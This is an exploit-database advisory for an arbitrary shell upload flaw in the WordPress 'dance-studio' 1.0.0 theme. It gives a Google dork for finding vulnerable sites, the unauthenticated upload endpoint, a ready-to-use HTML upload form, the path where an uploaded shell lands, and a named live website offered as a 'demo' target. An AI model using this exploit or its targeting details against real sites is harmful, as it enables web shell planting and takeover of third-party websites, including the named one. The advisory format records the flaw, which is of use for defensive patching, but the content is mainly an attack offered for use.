Wordpress Themes dance studio 1.0.0 - Arbitrary Shell Upload vulnerbility

2017.02.13
mr xBADGIRL21 (MR) mr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################## # Exploit Title : Wordpress Themes dance-studio - Arbitrary Shell Upload vulnerbility # Author : xBADGIRL21 # Google Dork: inurl:/wp-content/themes/dance-studio # Date: 12-11-2017 # Vendor Homepage: http://themes.cmsmasters.net/?theme=dance-studio by looplava # Version: 1.0.0 # Tested on: Win 7 # MyBlog : http://xbadgirl21.blogspot.com/ # Video Proof : https://youtu.be/unEP_-WWMy8 ################################################################################# # [*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz ################################################################################# # [!] Exploit : http://127.0.0.1/wordpress/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php # [!] Shell Path : http://127.0.0.1//wp-content/uploads/ ################################################################################# # [*] CoDe: ################################################################################# <html> <body> <form action="http://127.0.0.1/wordpress/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php" method="POST" enctype="multipart/form-data"> <input type="file" name="file" /> <input type="submit" value="Submit" /> </form> </body> </html> ################################################################################# # [*] Live Demo: ################################################################################# # https://abbyleedancecompany.com ################################################################################# # [*] ABOUT: ################################################################################# # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #################################################################################

References:

https://youtu.be/unEP_-WWMy8


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top